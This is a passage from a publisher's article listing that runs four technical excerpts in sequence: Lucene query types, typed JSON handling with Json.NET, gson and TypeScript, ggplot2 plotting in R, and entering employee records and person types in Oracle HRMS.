demonstrates BooleanQuery: BooleanQuery query = new BooleanQuery(); query.add(new BooleanClause( new TermQuery(new Term("content", "humpty")), BooleanClause.Occur.MUST)); query.add(new BooleanClause(new TermQuery( new Term("content", "dumpty")), BooleanClause.Occur.MUST)); query.add(new BooleanClause(new TermQuery( new Term("content", "wall")), BooleanClause.Occur.SHOULD)); query.add(new BooleanClause(new TermQuery( new Term("content", "sat")), BooleanClause.Occur.MUST_NOT)); How it works… In this demonstration, we will use TermQuery to illustrate the building of BooleanClauses. It's equivalent to this logic: (humpty AND dumpty) OR wall NOT sat. This code will return the second sentence from our setup. Because of the last MUST_NOT BooleanClause on the word "sat", the first sentence is filtered from the results. Note that BooleanClause accepts two arguments: a Query and a BooleanClause.Occur. BooleanClause.Occur is where you specify the matching options: MUST, MUST_NOT, and SHOULD. PrefixQuery and WildcardQuery PrefixQuery, as the name implies, matches documents with terms starting with a specified prefix. WildcardQuery allows you to use wildcard characters for wildcard matching. A PrefixQuery is somewhat similar to a WildcardQuery in which there is only one wildcard character at the end of a search string. When doing a wildcard search in QueryParser, it would return either a PrefixQuery or WildcardQuery, depending on the wildcard character's location. PrefixQuery is simpler and more efficient than WildcardQuery, so it's preferable to use PrefixQuery whenever possible. That's exactly what QueryParser does. How to do it... Here is a code snippet to demonstrate both Query types: PrefixQuery query = new PrefixQuery(new Term("content", "hum")); WildcardQuery query2 = new WildcardQuery(new Term("content", "*um*")); How it works… Both queries would return the same results from our setup. The PrefixQuery will match anything that starts with hum and the WildcardQuery would match anything that contains um. PhraseQuery and MultiPhraseQuery A PhraseQuery matches a particular sequence of terms, while a MultiPhraseQuery gives you an option to match multiple terms in the same position. For example, MultiPhrasQuery supports a phrase such as humpty (dumpty OR together) in which it matches humpty in position 0 and dumpty or together in position 1. How to do it... Here is a code snippet to demonstrate both Query types: PhraseQuery query = new PhraseQuery(); query.add(new Term("content", "humpty")); query.add(new Term("content", "together")); MultiPhraseQuery query2 = new MultiPhraseQuery(); Term[] terms1 = new Term[1];terms1[0] = new Term("content", "humpty"); Term[] terms2 = new Term[2];terms2[0] = new Term("content", "dumpty"); terms2[1] = new Term("content", "together"); query2.add(terms1); query2.add(terms2); How it works… The first Query, PhraseQuery, searches for the phrase humpty together. The second Query, MultiPhraseQuery, searches for the phrase humpty (dumpty OR together). The first Query would return sentence four from our setup, while the second Query would return sentence one, two, and four. Note that in MultiPhraseQuery, multiple terms in the same position are added as an array. FuzzyQuery A FuzzyQuery matches terms based on similarity, using the Damerau-Levenshtein algorithm. We are not going into the details of the algorithm as it is outside of our topic. What we need to know is a fuzzy match is measured in the number of edits between terms. FuzzyQuery allows a maximum of 2 edits. For example, between "humptX" and humpty is first edit and between humpXX and humpty are two edits. There is also a requirement that the number of edits must be less than the minimum term length (of either the input term or candidate term). As another example, ab and abcd would not match because the number of edits between the two terms is 2 and it's not greater than the length of ab, which is 2. How to do it... Here is a code snippet to demonstrate FuzzyQuery: FuzzyQuery query = new FuzzyQuery(new Term("content", "humpXX")); How it works… This Query will return sentences one, two, and four from our setup, as humpXX matches humpty within the two edits. In QueryParser, FuzzyQuery can be triggered by the tilde ( ~ ) sign. An equivalent search string would be humpXX~. Summary This gives you a glimpse of the various querying and filtering features that have been proven to build successful search engines. Resources for Article: Further resources on this subject: Extending ElasticSearch with Scripting [article] Downloading and Setting Up ElasticSearch [article] Lucene.NET: Optimizing and merging index segments [article]
Read more
  • 0
  • 0
  • 10430

article-image-json-jsonnet
Packt
25 Jun 2015
16 min read
Save for later

JSON with JSON.Net

Packt
25 Jun 2015
16 min read
In this article by Ray Rischpater, author of the book JavaScript JSON Cookbook, we show you how you can use strong typing in your applications with JSON using C#, Java, and TypeScript. You'll find the following recipes: How to deserialize an object using Json.NET How to handle date and time objects using Json.NET How to deserialize an object using gson for Java How to use TypeScript with Node.js How to annotate simple types using TypeScript How to declare interfaces using TypeScript How to declare classes with interfaces using TypeScript Using json2ts to generate TypeScript interfaces from your JSON (For more resources related to this topic, see here.) While some say that strong types are for weak minds, the truth is that strong typing in programming languages can help you avoid whole classes of errors in which you mistakenly assume that an object of one type is really of a different type. Languages such as C# and Java provide strong types for exactly this reason. Fortunately, the JSON serializers for C# and Java support strong typing, which is especially handy once you've figured out your object representation and simply want to map JSON to instances of classes you've already defined. We use Json.NET for C# and gson for Java to convert from JSON to instances of classes you define in your application. Finally, we take a look at TypeScript, an extension of JavaScript that provides compile-time checking of types, compiling to plain JavaScript for use with Node.js and browsers. We'll look at how to install the TypeScript compiler for Node.js, how to use TypeScript to annotate types and interfaces, and how to use a web page by Timmy Kokke to automatically generate TypeScript interfaces from JSON objects. How to deserialize an object using Json.NET In this recipe, we show you how to use Newtonsoft's Json.NET to deserialize JSON to an object that's an instance of a class. We'll use Json.NET because although this works with the existing .NET JSON serializer, there are other things that I want you to know about Json.NET, which we'll discuss in the next two recipes. Getting ready To begin, you need to be sure you have a reference to Json.NET in your project. The easiest way to do this is to use NuGet; launch NuGet, search for Json.NET, and click on Install, as shown in the following screenshot: You'll also need a reference to the Newonsoft.Json namespace in any file that needs those classes with a using directive at the top of your file: usingNewtonsoft.Json; How to do it… Here's an example that provides the implementation of a simple class, converts a JSON string to an instance of that class, and then converts the instance back into JSON: using System; usingNewtonsoft.Json;   namespaceJSONExample {   public class Record {    public string call;    public double lat;    public double lng; } class Program {    static void Main(string[] args)      {        String json = @"{ 'call': 'kf6gpe-9',        'lat': 21.9749, 'lng': 159.3686 }";          var result = JsonConvert.DeserializeObject<Record>(          json, newJsonSerializerSettings            {        MissingMemberHandling = MissingMemberHandling.Error          });        Console.Write(JsonConvert.SerializeObject(result));          return;        } } } How it works… In order to deserialize the JSON in a type-safe manner, we need to have a class that has the same fields as our JSON. The Record class, defined in the first few lines does this, defining fields for call, lat, and lng. The Newtonsoft.Json namespace provides the JsonConvert class with static methods SerializeObject and DeserializeObject. DeserializeObject is a generic method, taking the type of the object that should be returned as a type argument, and as arguments the JSON to parse, and an optional argument indicating options for the JSON parsing. We pass the MissingMemberHandling property as a setting, indicating with the value of the enumeration Error that in the event that a field is missing, the parser should throw an exception. After parsing the class, we convert it again to JSON and write the resulting JSON to the console. There's more… If you skip passing the MissingMember option or pass Ignore (the default), you can have mismatches between field names in your JSON and your class, which probably isn't what you want for type-safe conversion. You can also pass the NullValueHandling field with a value of Include or Ignore. If Include, fields with null values are included; if Ignore, fields with Null values are ignored. See also The full documentation for Json.NET is at http://www.newtonsoft.com/json/help/html/Introduction.htm. Type-safe deserialization is also possible with JSON support using the .NET serializer; the syntax is similar. For an example, see the documentation for the JavaScriptSerializer class at https://msdn.microsoft.com/en-us/library/system.web.script.serialization.javascriptserializer(v=vs.110).aspx. How to handle date and time objects using Json.NET Dates in JSON are problematic for people because JavaScript's dates are in milliseconds from the epoch, which are generally unreadable to people. Different JSON parsers handle this differently; Json.NET has a nice IsoDateTimeConverter that formats the date and time in ISO format, making it human-readable for debugging or parsing on platforms other than JavaScript. You can extend this method to converting any kind of formatted data in JSON attributes, too, by creating new converter objects and using the converter object to convert from one value type to another. How to do it… Simply include a new IsoDateTimeConverter object when you call JsonConvert.Serialize, like this: string json = JsonConvert.SerializeObject(p, newIsoDateTimeConverter()); How it works… This causes the serializer to invoke the IsoDateTimeConverter instance with any instance of date and time objects, returning ISO strings like this in your JSON: 2015-07-29T08:00:00 There's more… Note that this can be parsed by Json.NET, but not JavaScript; in JavaScript, you'll want to use a function like this: Function isoDateReviver(value) { if (typeof value === 'string') { var a = /^(d{4})-(d{2})-(d{2})T(d{2}):(d{2}):(d{2}(?:.d*)?)(?:([+-])(d{2}):(d{2}))?Z?$/ .exec(value); if (a) {      var utcMilliseconds = Date.UTC(+a[1],          +a[2] - 1,          +a[3],          +a[4],          +a[5],          +a[6]);        return new Date(utcMilliseconds);    } } return value; } The rather hairy regular expression on the third line matches dates in the ISO format, extracting each of the fields. If the regular expression finds a match, it extracts each of the date fields, which are then used by the Date class's UTC method to create a new date. Note that the entire regular expression—everything between the/characters—should be on one line with no whitespace. It's a little long for this page, however! See also For more information on how Json.NET handles dates and times, see the documentation and example at http://www.newtonsoft.com/json/help/html/SerializeDateFormatHandling.htm. How to deserialize an object using gson for Java Like Json.NET, gson provides a way to specify the destination class to which you're deserializing a JSON object. Getting ready You'll need to include the gson JAR file in your application, just as you would for any other external API. How to do it… You use the same method as you use for type-unsafe JSON parsing using gson using fromJson, except you pass the class object to gson as the second argument, like this: // Assuming we have a class Record that looks like this: /* class Record { private String call; private float lat; private float lng;    // public API would access these fields } */   Gson gson = new com.google.gson.Gson(); String json = "{ "call": "kf6gpe-9", "lat": 21.9749, "lng": 159.3686 }"; Record result = gson.fromJson(json, Record.class); How it works… The fromGson method always takes a Java class. In the example in this recipe, we convert directly to a plain old Java object that our application can use without needing to use the dereferencing and type conversion interface of JsonElement that gson provides. There's more… The gson library can also deal with nested types and arrays as well. You can also hide fields from being serialized or deserialized by declaring them transient, which makes sense because transient fields aren't serialized. See also The documentation for gson and its support for deserializing instances of classes is at https://sites.google.com/site/gson/gson-user-guide#TOC-Object-Examples. How to use TypeScript with Node.js Using TypeScript with Visual Studio is easy; it's just part of the installation of Visual Studio for any version after Visual Studio 2013 Update 2. Getting the TypeScript compiler for Node.js is almost as easy—it's an npm install away. How to do it… On a command line with npm in your path, run the following command: npm install –g typescript The npm option –g tells npm to install the TypeScript compiler globally, so it's available to every Node.js application you write. Once you run it, npm downloads and installs the TypeScript compiler binary for your platform. There's more… Once you run this command to install the compiler, you'll have the TypeScript compiler tsc available on the command line. Compiling a file with tsc is as easy as writing the source code and saving in a file that ends in .ts extension, and running tsc on it. For example, given the following TypeScript saved in the file hello.ts: function greeter(person: string) { return "Hello, " + person; }   var user: string = "Ray";   console.log(greeter(user)); Running tschello.ts at the command line creates the following JavaScript: function greeter(person) { return "Hello, " + person; }   var user = "Ray";   console.log(greeter(user)); Try it! As we'll see in the next section, the function declaration for greeter contains a single TypeScript annotation; it declares the argument person to be string. Add the following line to the bottom of hello.ts: console.log(greeter(2)); Now, run the tschello.ts command again; you'll get an error like this one: C:UsersrarischpDocumentsnode.jstypescripthello.ts(8,13): error TS2082: Supplied parameters do not match any signature of call target:        Could not apply type 'string' to argument 1 which is         of type 'number'. C:UsersrarischpDocumentsnode.jstypescripthello.ts(8,13): error TS2087: Could not select overload for 'call' expression. This error indicates that I'm attempting to call greeter with a value of the wrong type, passing a number where greeter expects a string. In the next recipe, we'll look at the kinds of type annotations TypeScript supports for simple types. See also The TypeScript home page, with tutorials and reference documentation, is at http://www.typescriptlang.org/. How to annotate simple types using TypeScript Type annotations with TypeScript are simple decorators appended to the variable or function after a colon. There's support for the same primitive types as in JavaScript, and to declare interfaces and classes, which we will discuss next. How to do it… Here's a simple example of some variable declarations and two function declarations: function greeter(person: string): string { return "Hello, " + person; }   function circumference(radius: number) : number { var pi: number = 3.141592654; return 2 * pi * radius; }   var user: string = "Ray";   console.log(greeter(user)); console.log("You need " + circumference(2) + " meters of fence for your dog."); This example shows how to annotate functions and variables. How it works… Variables—either standalone or as arguments to a function—are decorated using a colon and then the type. For example, the first function, greeter, takes a single argument, person, which must be a string. The second function, circumference, takes a radius, which must be a number, and declares a single variable in its scope, pi, which must be a number and has the value 3.141592654. You declare functions in the normal way as in JavaScript, and then add the type annotation after the function name, again using a colon and the type. So, greeter returns a string, and circumference returns a number. There's more… TypeScript defines the following fundamental type decorators, which map to their underlying JavaScript types: array: This is a composite type. For example, you can write a list of strings as follows: var list:string[] = [ "one", "two", "three"]; boolean: This type decorator can contain the values true and false. number: This type decorator is like JavaScript itself, can be any floating-point number. string: This type decorator is a character string. enum: An enumeration, written with the enum keyword, like this: enumColor { Red = 1, Green, Blue }; var c : Color = Color.Blue; any: This type indicates that the variable may be of any type. void: This type indicates that the value has no type. You'll use void to indicate a function that returns nothing. See also For a list of the TypeScript types, see the TypeScript handbook at http://www.typescriptlang.org/Handbook. How to declare interfaces using TypeScript An interface defines how something behaves, without defining the implementation. In TypeScript, an interface names a complex type by describing the fields it has. This is known as structural subtyping. How to do it… Declaring an interface is a little like declaring a structure or class; you define the fields in the interface, each with its own type, like this: interface Record { call: string; lat: number; lng: number; }   Function printLocation(r: Record) { console.log(r.call + ': ' + r.lat + ', ' + r.lng); }   var myObj = {call: 'kf6gpe-7', lat: 21.9749, lng: 159.3686};   printLocation(myObj); How it works… The interface keyword in TypeScript defines an interface; as I already noted, an interface consists of the fields it declares with their types. In this listing, I defined a plain JavaScript object, myObj and then called the function printLocation, that I previously defined, which takes a Record. When calling printLocation with myObj, the TypeScript compiler checks the fields and types each field and only permits a call to printLocation if the object matches the interface. There's more… Beware! TypeScript can only provide compile-type checking. What do you think the following code does? interface Record { call: string; lat: number; lng: number; }   Function printLocation(r: Record) { console.log(r.call + ': ' + r.lat + ', ' + r.lng); }   var myObj = {call: 'kf6gpe-7', lat: 21.9749, lng: 159.3686}; printLocation(myObj);   var json = '{"call":"kf6gpe-7","lat":21.9749}'; var myOtherObj = JSON.parse(json); printLocation(myOtherObj); First, this compiles with tsc just fine. When you run it with node, you'll see the following: kf6gpe-7: 21.9749, 159.3686 kf6gpe-7: 21.9749, undefined What happened? The TypeScript compiler does not add run-time type checking to your code, so you can't impose an interface on a run-time created object that's not a literal. In this example, because the lng field is missing from the JSON, the function can't print it, and prints the value undefined instead. This doesn't mean that you shouldn't use TypeScript with JSON, however. Type annotations serve a purpose for all readers of the code, be they compilers or people. You can use type annotations to indicate your intent as a developer, and readers of the code can better understand the design and limitation of the code you write. See also For more information about interfaces, see the TypeScript documentation at http://www.typescriptlang.org/Handbook#interfaces. How to declare classes with interfaces using TypeScript Interfaces let you specify behavior without specifying implementation; classes let you encapsulate implementation details behind an interface. TypeScript classes can encapsulate fields or methods, just as classes in other languages. How to do it… Here's an example of our Record structure, this time as a class with an interface: class RecordInterface { call: string; lat: number; lng: number;   constructor(c: string, la: number, lo: number) {} printLocation() {}   }   class Record implements RecordInterface { call: string; lat: number; lng: number; constructor(c: string, la: number, lo: number) {    this.call = c;    this.lat = la;    this.lng = lo; }   printLocation() {    console.log(this.call + ': ' + this.lat + ', ' + this.lng); } }   var myObj : Record = new Record('kf6gpe-7', 21.9749, 159.3686);   myObj.printLocation(); How it works… The interface keyword, again, defines an interface just as the previous section shows. The class keyword, which you haven't seen before, implements a class; the optional implements keyword indicates that this class implements the interface RecordInterface. Note that the class implementing the interface must have all of the same fields and methods that the interface prescribes; otherwise, it doesn't meet the requirements of the interface. As a result, our Record class includes fields for call, lat, and lng, with the same types as in the interface, as well as the methods constructor and printLocation. The constructor method is a special method called when you create a new instance of the class using new. Note that with classes, unlike regular objects, the correct way to create them is by using a constructor, rather than just building them up as a collection of fields and values. We do that on the second to the last line of the listing, passing the constructor arguments as function arguments to the class constructor. See also There's a lot more you can do with classes, including defining inheritance and creating public and private fields and methods. For more information about classes in TypeScript, see the documentation at http://www.typescriptlang.org/Handbook#classes. Using json2ts to generate TypeScript interfaces from your JSON This last recipe is more of a tip than a recipe; if you've got some JSON you developed using another programming language or by hand, you can easily create a TypeScript interface for objects to contain the JSON by using Timmy Kokke's json2ts website. How to do it… Simply go to http://json2ts.com and paste your JSON in the box that appears, and click on the generate TypeScript button. You'll be rewarded with a second text-box that appears and shows you the definition of the TypeScript interface, which you can save as its own file and include in your TypeScript applications. How it works… The following figure shows a simple example: You can save this typescript as its own file, a definition file, with the suffix .d.ts, and then include the module with your TypeScript using the import keyword, like this: import module = require('module'); Summary In this article we looked at how you can adapt the type-free nature of JSON with the type safety provided by languages such as C#, Java, and TypeScript to reduce programming errors in your application. Resources for Article: Further resources on this subject: Playing with Swift [article] Getting Started with JSON [article] Top two features of GSON [article]
Read more
  • 0
  • 0
  • 4590

article-image-introduction-ggplot2-and-plotting-environments-r
Packt
25 Jun 2015
15 min read
Save for later

Introduction to ggplot2 and the plotting environments in R

Packt
25 Jun 2015
15 min read
In this article by Donato Teutonico, author of the book ggplot2 Essentials, we are going to explore different plotting environments in R and subsequently learn about the package, ggplot2. R provides a complete series of options available for realizing graphics, which make this software quite advanced concerning data visualization. The core of the graphics visualization in R is within the package grDevices, which provides the basic structure of data plotting, as for instance the colors and fonts used in the plots. Such graphic engine was then used as starting point in the development of more advanced and sophisticated packages for data visualization; the most commonly used being graphics and grid. (For more resources related to this topic, see here.) The graphics package is often referred to as the base or traditional graphics environment, since historically it was already available among the default packages delivered with the base installation of R and it provides functions that allow to the generation of complete plots. The grid package developed by Paul Murrell, on the other side, provides an alternative set of graphics tools. This package does not provide directly functions that generate complete plots, so it is not frequently used directly for generating graphics, but it was used in the development of advanced data visualization packages. Among the grid-based packages, the most widely used are lattice and ggplot2, although they are built implementing different visualization approaches. In fact lattice was build implementing the Trellis plots, while ggplot2 was build implementing the grammar of graphics. A diagram representing the connections between the tools just mentioned is represented in the Figure 1. Figure 1: Overview of the most widely used R packages for graphics Just keep in mind that this is not a complete overview of the packages available, but simply a small snapshot on the main packages used for data visualization in R, since many other packages are built on top of the tools just mentioned. If you would like to get a more complete overview of the graphics tools available in R, you may have a look at the web page of the R project summarizing such tools, http://cran.r-project.org/web/views/Graphics.html. ggplot2 and the Grammar of Graphics The package ggplot2 was developed by Hadley Wickham by implementing a completely different approach to statistical plots. As in the case of lattice, this package is also based on grid, providing a series of high-level functions which allow the creation of complete plots. The ggplot2 package provides an interpretation and extension of the principles of the book The Grammar of Graphics by Leland Wilkinson. Briefly, the Grammar of Graphics assumes that a statistical graphic is a mapping of data to aesthetic attributes and geometric objects used to represent the data, like points, lines, bars, and so on. Together with the aesthetic attributes, the plot can also contain statistical transformation or grouping of the data. As in lattice, also in ggplot2 we have the possibility to split data by a certain variable obtaining a representation of each subset of data in an independent sub-plot; such representation in ggplot2 is called faceting. In a more formal way, the main components of the grammar of graphics are: the data and their mapping, the aesthetic, the geometric objects, the statistical transformations, scales, coordinates and faceting. A more detailed description of these elements is provided along the book ggplot2 Essentials, but this is a summary of the general principles The data that must be visualized are mapped to aesthetic attributes which define how the data should be perceived The geometric objects describe what is actually represented on the plot like lines, points, or bars; the geometric objects basically define which kind of plot you are going to draw The statistical transformations are transformations which are applied to the data to group them; an example of statistical transformations would be, for instance, the smooth line or the regression lines of the previous examples or the binning of the histograms. Scales represent the connection between the aesthetic spaces with the actual values which should be represented. Scales maybe also be used to draw legends The coordinates represent the coordinate system in which the data are drawn The faceting, which we have already mentioned, is a grouping of data in subsets defined by a value of one variable In ggplot2 there are two main high-level functions, capable of creating directly creating a plot, qplot() and ggplot(); qplot() stands for quick plot and it is a simple function with serve a similar purpose to the plot() function in graphics. The function ggplot() on the other side is a much more advanced function which allow the user to have a deep control of the plot layout and details. In this article we will see some examples of qplot() in order to provide you with a taste of the typical plots which can be realized with ggplot2, but for more advanced data visualization the function ggplot(), is much more flexible. If you have a look on the different forums of R programming, there is quite some discussion about which of these two functions would be more convenient to use. My general recommendation would be that it depends on the type of graph you are drawing more frequently. For simple and standard plot, where basically only the data should be represented and some minor modification of standard layout, the qplot() function will do the job. On the other side, if you would need to apply particular transformations to the data or simply if you would like to keep the freedom of controlling and defining the different details of the plot layout, I would recommend to focus in learning the code of ggplot(). In the code below you will see an example of plot realized with ggplot2 where you can identify some of the components of the grammar of graphics. The example is realized with the function ggplot() which allow a more direct comparison with the grammar, but just below you may also find the corresponding code for the use of qplot(). Both codes generate the graph depicted on Figure 2. require(ggplot2) ## Load ggplot2 data(Orange) # Load the data   ggplot(data=Orange,    ## Data used aes(x=circumference,y=age, color=Tree))+  ##mapping to aesthetic geom_point()+      ##Add geometry (plot with data points) stat_smooth(method="lm",se=FALSE) ##Add statistics(linear regression)   ### Corresponding code with qplot() qplot(circumference,age,data=Orange, ## Data used color=Tree, ## Aestetic mapping geom=c("point","smooth"),method="lm",se=FALSE) This simple example can give you an idea of the role of each portion of code in a ggplot2 graph; you have seen how the main function body create the connection between the data and the aesthetic we are interested to represent and how, on top of this, you add the components of the plot like in this case the geometry element of points and the statistical element of regression. You can also notice how the components which need to be added to the main function call are included using the + sign. One more thing worth to mention at this point, is the if you run just the main body function in the ggplot() function, you will get an error message. This is because this call is not able to generate an actual plot. The step during which the plot is actually created is when you include the geometric attributes, in this case geom_point(). This is perfectly in line with the grammar of graphics, since as we have seen the geometry represent the actual connection between the data and what is represented on the plot. Is in fact at this stage that we specify we are interested in having points representing the data, before that nothing was specified yet about which plot we were interested in drawing. Figure 2: Example of plot of Orange dataset with ggplot2 The qplot() function The qplot (quick plot) function is a basic high level function of ggplot2. The general syntax that you should use with this function is the following qplot(x, y, data, colour, shape, size, facets, geom, stat) where x and y represent the variables to plot (y is optional with a default value NULL) data define the dataset containing the variables colour, shape and size are the aesthetic arguments that can be mapped on additional variables facets define the optional faceting of the plot based on one variable contained in the dataset geom allows you to select the actual visualization of the data, which basically will represent the plot which will be generated. Possible values are point, line or boxplot, but we will see several different examples in the next pages stat define the statistics to be used on the data These options represents the most important options available in qplot(). You may find a descriptions of the other function arguments in the help page of the function accessible with ?qplot, or on the ggplot2 website under the following link http://docs.ggplot2.org/0.9.3/qplot.html. Most of the options just discussed can be applied to different types of plots, since most of the concepts of the grammar of graphics, embedded in the code, may be translated from one plot to the other. For instance, you may use the argument colour to do an aesthetics mapping to one variable; these same concepts can in example be applied to scatterplots as well as histograms. Exactly the same principle would be applied to facets, which can be used for splitting plots independently on the type of plot considered. Histograms and density plots Histograms are plots used to explore how one (or more) quantitative variables are distributed. To show some examples of histograms we will use the iris data. This dataset contains measurements in centimetres of the variables sepal length and width and petal length and width for 50 flowers from each of three species of the flower iris: iris setosa, versicolor, and virginica. You may find more details running ?iris. The geometric attribute used to produce histograms is simply by specifying geom=”histogram” in the qplot() function. This default histogram will represent the variable specified on the x axis while the y axis will represent the number of elements in each bin. One other very useful way of representing distributions is to look at the kernel density function, which will basically produce a sort of continuous histogram instead of different bins by estimating the probability density function. For example let’s plot the petal length of all the three species of iris as histogram and density plot. data(iris)   ## Load data qplot(Petal.Length, data=iris, geom="histogram") ## Histogram qplot(Petal.Length, data=iris, geom="density")   ## Density plot The output of this code is showed in Figure 3. Figure 3: Histogram (left) and density plot (right) As you can see in both plots of Figure 3, it appears that the data are not distributed homogenously, but there are at least two distinct distribution clearly separated. This is very reasonably due to a different distribution for one of the iris species. To try to verify if the two distributions are indeed related to specie differences, we could generate the same plot using aesthetic attributes and have a different colour for each subtype of iris. To do this, we can simply map the fill to the Species column in the dataset; also in this case we can do that for the histogram and the density plot too. Below you may see the code we built, and in Figure 4 the resulting output. qplot(Petal.Length, data=iris, geom="histogram", colour=Species, fill=Species) qplot(Petal.Length, data=iris, geom="density", colour=Species, fill=Species) Figure 4: Histogram (left) and density plot (right) with aesthetic attribute for colour and fill In the distribution we can see that the lower data are coming from the Setosa species, while the two other distributions are partly overlapping. Scatterplots Scatterplots are probably the most common plot, since they are usually used to display the relationship between two quantitative variables. When two variables are provided, ggplot2 will make a scatterplot by default. For our example on how to build a scatterplot, we will use a dataset called ToothGrowth, which is available in the base R installation. In this dataset are reported measurements of teeth length of 10 guinea pig for three different doses of vitamin C (0.5, 1, and 2 mg) delivered in two different ways, as orange juice or as ascorbic acid (a compound having vitamin C activity). You can find, as usual, details on these data on the dataset help page at ?ToothGrowth. We are interested in seeing how the length of the teeth changed for the different doses. We are not able to distinguish among the different guinea pigs, since this information is not contained in the data, so for the moment we will plot just all the data we have. So let’s load the dataset and do a basic plot of the dose vs. length. require(ggplot2) data(ToothGrowth) qplot(dose, len, data=ToothGrowth, geom="point") ##Alternative coding qplot(dose, len, data=ToothGrowth) The resulting plot is reproduced in Figure 5. As you have seen, the default plot generated, also without a geom argument, is the scatter plot, which is the default bivariate plot type. In this plot we may have an idea of the tendency the data have, for instance we see that the teeth length increase by increasing the amount of vitamin C intake. On the other side, we know that there are two different subgroups in our data, since the vitamin C was provided in two different ways, as orange juice or as ascorbic acid, so it could be interesting to check if these two groups behave differently. Figure 5: Scatterplot of length vs. dose of ToothGrowth data The first approach could be to have the data in two different colours. To do that we simply need to assign the colour attribute to the column sup in the data, which defines the way of vitamin intake. The resulting plot is in Figure 6. qplot(dose, len,data=ToothGrowth, geom="point", col=supp) We now can distinguish from which intake route come each data in the plot and it looks like the data from orange juice shown are a little higher compared to ascorbic acid, but to differentiate between them it is not really easy. We could then try with the facets, so that the data will be completely separated in two different sub-plots. So let´s see what happens. Figure 6: Scatterplot of length vs. dose of ToothGrowth with data in different colours depending on vitamin intake. qplot(dose, len,data=ToothGrowth, geom="point", facets=.~supp) In this new plot, showed in Figure 7, we definitely have a better picture of the data, since we can see how the tooth growth differs for the different intakes. As you have seen, in this simple example, you will find that the best visualization may be different depending on the data you have. In some cases grouping a variable with colours or dividing the data with faceting may give you a different idea about the data and their tendency. For instance in our case with the plot in Figure 7 we can see that the way how the tooth growth increase with dose seems to be different for the different intake routes. Figure 7: Scatterplot of length vs. dose of ToothGrowth with faceting One approach to see the general tendency of the data could be to include a smooth line to the graph. In this case in fact we can see that the growth in the case of the orange juice does not looks really linear, so a smooth line could be a nice way to catch this. In order to do that we simply add a smooth curve to the vector of geometry components in the qplot() function. qplot(dose, len,data=ToothGrowth, geom=c("point","smooth"), facets=.~supp) As you can see from the plot obtained (Figure 8) we now see not only clearly the different data thanks to the faceting, but we can also see the tendency of the data with respect to the dose administered. As you have seen, requiring for the smooth line in ggplot2 will also include a confidence interval in the plot. If you would like to not to have the confidence interval you may simply add the argument se=FALSE. Figure 8: Scatterplot of length vs. dose of ToothGrowth with faceting and smooth line Summary In this short article we have seen some basic concept of ggplot2, ranging from the basic principles in comparison with the other R packages for graphics, up to some basic plots as for instance histograms, density plots or scatterplots. In this case we have limited our example to the use of qplot(), which enable us to obtain plots with some easy commands, but on the other side, in order to have a full control of plot appearance as well as data representation the function ggplot() will provide you with much more advanced functionalities. You can find a more detailed description of these functions as well as of the different features of ggplot2 together illustrated in various examples in the book ggplot2 Essentials. Resources for Article: Further resources on this subject: Data Analysis Using R [article] Data visualization [article] Using R for Statistics, Research, and Graphics [article]
Read more
  • 0
  • 0
  • 10526

article-image-entering-people-information
Packt
24 Jun 2015
9 min read
Save for later

Entering People Information

Packt
24 Jun 2015
9 min read
In this article by Pravin Ingawale, author of the book Oracle E-Business Suite R12.x HRMS – A Functionality Guide, will learn about entering a person's information in Oracle HRMS. We will understand the hiring process in Oracle. This, actually, is part of the Oracle I-recruitment module in Oracle apps. Then we will see how to create an employee in Core HR. Then, we will learn the concept of person types and defining person types. We will also learn about entering information for an employee, including additional information. Let's see how to create an employee in core HR. (For more resources related to this topic, see here.) Creating an employee An employee is the most important entity in an organization. Before creating an employee, the HR officer must know the date from which the employee will be active in the organization. In Oracle terminology, you can call it the employee's hire date. Apart from this, the HR officer must know basic details of the employee such as first name, last name, date of birth, and so on. Navigate to US HRMS Manager | People | Enter and Maintain. This is the basic form, called People in Oracle HRMS, which is used to create an employee in the application. As you can see in the form, there is a field named Last, which is marked in yellow. This indicates that this is mandatory to create an employee record. First, you need to set the effective date on the form. You can set this by clicking on the icon, as shown in the following screenshot: You need to enter the mandatory field data along with additional data. The following screenshot shows the data entered: Once you enter the required data, you need to specify the action for the entered record. The action we have selected is Create Employment. The Create Employment action will create an employee in the application. There are other actions such as Create Applicant, which is used to create an applicant for I-Recruitment. The Create Placement action is used to create a contingent worker in your enterprise. Once you select this action, it will prompt you to enter the person type of this employee as in the following screenshot. Select the Person Type as Employee and save the record. We will see the concept of person type in the next section. Once you select the employee person type and then save the record, the system will automatically generate the employee number for the person. In our case, the system has generated an employee number 10160. So now, we have created an employee in the application. Concept of person types In any organization, you need to identify different types of people. Here, you can say that you need to group different types of people. There are basically three types of people you capture in HRMS system. They are as follows: Employees: These include current employees and past employees. Past employees are those who were part of your enterprise earlier and are no longer active in the system. You can call them terminated or ex-employees. Applicants: If you are using I-recruitment, applicants can be created. External people: Contact is a special category of external type. Contacts are associated with an employee or an applicant. For example, there might be a need to record the name, address, and phone number of an emergency contact for each employee in your organization. There might also be a need to keep information on dependents of an employee for medical insurance purposes or for some payments in payroll processing. Using person types There are predefined person types in Oracle HRMS. You can add more person types as per your requirements. You can also change the name of existing person types when you install the system. Let's take an example for your understanding. Your organization has employees. There might be employees of different types; you might have regular employees and employees who are contractors in your organization. Hence, you can categorize employees in your organization into two types: Regular employees Consultants The reason for creating these categories is to easily identify the employee type and store different types of information for each category. Similarly, if you are using I-recruitment, then you will have candidates. Hence, you can categorize candidates into two types. One will be internal candidate and the other will be external candidate. Internal candidates will be employees within your organization who can apply for an opening within your organization. An external candidate is an applicant who does not work for your organization but is applying for a position that is open in your company. Defining person types In an earlier section, you learned the concept of person types, and now you will learn how to define person types in the system. Navigate to US HRMS Manager | Other Definitions | Person Types. In the preceding screenshot, you can see four fields, that is, User Name, System Name, Active, and Default flag. There are eight person types recognized by the system and identified by a system name. For each system name, there are predefined usernames. A username can be changed as per your needs. There must be one username that should be the default. While creating an employee, the person types that are marked by the default flag will come by default. To change a username for a person type, delete the contents of the User Name field and type the name you'd prefer to keep. To add a new username to a person type system name: Select New Record from the Edit menu. Enter a unique username and select the system name you want to use. Deactivating person types You cannot delete person types, but you can deactivate them by unchecking the Active checkbox. Entering personal and additional information Until now, you learned how to create an employee by entering basic details such as title, gender, and date of birth. In addition to this, you can enter some other information for an employee. As you can see on the people form, there are various tabs such as Employment, Office details, Background, and so on. Each tab has some fields that can store information. For example, in our case, we have stored the e-mail address of the employee in the Office Details tab. Whenever you enter any data for an employee and then click on the Save button, it will give you two options as shown in the following screenshot: You have to select one of the options to save the data. The differences between both the options are explained with an example. Let's say you have hired a new employee as of 01-Jan-2014. Hence, a new record will be created in the application with the start date as 01-Jan-2014. This is called an 